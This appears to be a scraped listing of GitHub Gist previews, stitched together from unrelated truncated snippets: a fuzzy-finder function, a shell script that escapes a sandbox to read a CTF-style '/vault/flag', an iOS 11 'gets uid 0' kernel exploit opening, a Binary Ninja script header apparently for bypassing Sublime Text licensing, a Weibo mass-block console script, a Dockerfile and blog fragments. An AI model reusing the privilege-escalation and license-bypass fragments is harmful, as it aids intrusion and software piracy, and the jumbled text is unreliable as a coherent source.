| def fuzzyfinder(p, l): | |
| return map(lambda t: t[0], sorted(filter(lambda t: all(map(lambda x: x != -1, t[1])), map(lambda s: (s,map(s.find, p)), l)), key=lambda t: t[1])) |
| #!/bin/sh | |
| echo 'sleep 600' | /tmp/unshare & | |
| sleep 1; | |
| echo 'echo -e "r\n/proc/self/fd/3/vault/flag" | /home/adam/vault_explorer' | /tmp/opendir /proc/$!/root |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <string> | |
| #include <grp.h> | |
| #include <sys/user.h> | |
| #include <assert.h> | |
| // mach | |
| #include <mach/mach.h> | |
| #include <mach/mach_init.h> |
I recently made my first map with MapBox's new WebGL+JavaScript API. There aren't many examples of how to do this yet, even on MapBox's API page, so I'll document my own experience here.
My map is made of several textures taken from Van Gogh paintings. The long-term goal is to allow a user to select which artworks they want to take textures from, but for now there is just one setting.
| # using VirtualBox version $VBOX_VERSION | |
| FROM boot2docker/boot2docker | |
| RUN apt-get install p7zip-full | |
| RUN mkdir -p /vboxguest && \ | |
| cd /vboxguest && \ | |
| curl -L -o vboxguest.iso http://download.virtualbox.org/virtualbox/$VBOX_VERSION/VBoxGuestAdditions_$VBOX_VERSION.iso && \ | |
| 7z x vboxguest.iso -ir'!VBoxLinuxAdditions.run' && \ | |
| sh VBoxLinuxAdditions.run --noexec --target . && \ |
It has come to my attention that BlackHat EU had talks from Alibaba Security about iOS security topics. It seems to be from the same people that have previously presented at DEFCON. Back then I had publicly discussed how their talk is basically just a summary of other people's work that is heavily miscredited to the wrong people.
Considering this history it is surprising that BlackHat would allow the same people to give a talk again on iOS security topics. But I have given up a long time ago on the BlackHat review board and their decisions, which is one of the reasons why I have stopped submitting to them years ago.
But I am digressing from the actual reason for this GIST. And no it is not about the fact that the talk once again starts with summarizing other people's work and crediting the wrong parties for the work done. In this GIST I want to go over one of the slides from the "summary part" of the talk, because not a single item on that slide is correct information.
So here is the offending slide:
| # Disclaimer and license | |
| # This code is provided without any warranty whatsoever, express or implied. I don't take responsibility for what you choose to do with it. | |
| # Only use this code in accordance with United States and local law. It is provided for educational purposes only. | |
| # Don't use the code unless you already own a legitimate product license for Sublime Text or Sublime Merge. | |
| # By using or studying the code you agree to abide by these terms and conditions. | |
| # Do not contact me if the script is broken because I am not offering support for it. | |
| # You may freely redistribute this code as long as this license is also attached. | |
| # this script should be run in the binaryninja console | |
| def yeet(): |
| // 1. 使用 chrome 打开 weibo.com (确保你登录了微博) | |
| // 2. 打开调试窗口,在 console 中贴下面的代码后回车 | |
| // 数据来自:https://github.com/yu961549745/WeiboBlackList | |
| let dogs = [ 5471246591, 5209943797, 1709070650, 1887921907, 1824515351, 6031549751, 3477430640, 5303365027, 2397004535, 5014141958, 2357033797, 2253196910, 1282371413, 5433169859, 5577097996, 2477460747, 5791757379, 3973075219, 5480191060, 5064046310, 1794010902, 5241254653, 1775613335, 1749775825, 2898929101, 1766122373, 5330205046, 5836217079, 2143736030, 5088125436, 2122838230, 2379528185, 5768433920, 1588830357, 2734746975, 1702267517, 3305446403, 1922854483, 2240459775, 1713064495, 3141318761, 3049734521, 1297708027, 1670201221, 1113091931, 2682353630, 1889031894, 5736617825, 5573535479, 1787098822, 5474940961, 2647495542, 1978558182, 5675487085, 2066669447, 1410124131, 3318338712, 5117947348, 5984813988, 1935760780, 2106405744, 1658278557, 3123751063, 2418980745, 5612086708, 2822792580, 2728966594, 5651704821, 3174983660, 2884830430, 1409910532, 5289026864, 5460203843, 30409 |
| // gets uid 0 (iOS 11) | |
| // add patchfinder and you should be good | |
| // Abraham Masri @cheesecakeufo | |
| /* | |
| * Purpose: iterates over the procs and finds our proc | |
| */ | |
| uint64_t get_our_proc() { |
The instructions here are useful although the current packages in Arch and Debian repositories do not work with iOS 7 (Trust Loop Bug) but it is still a good starting point to understand how this works.
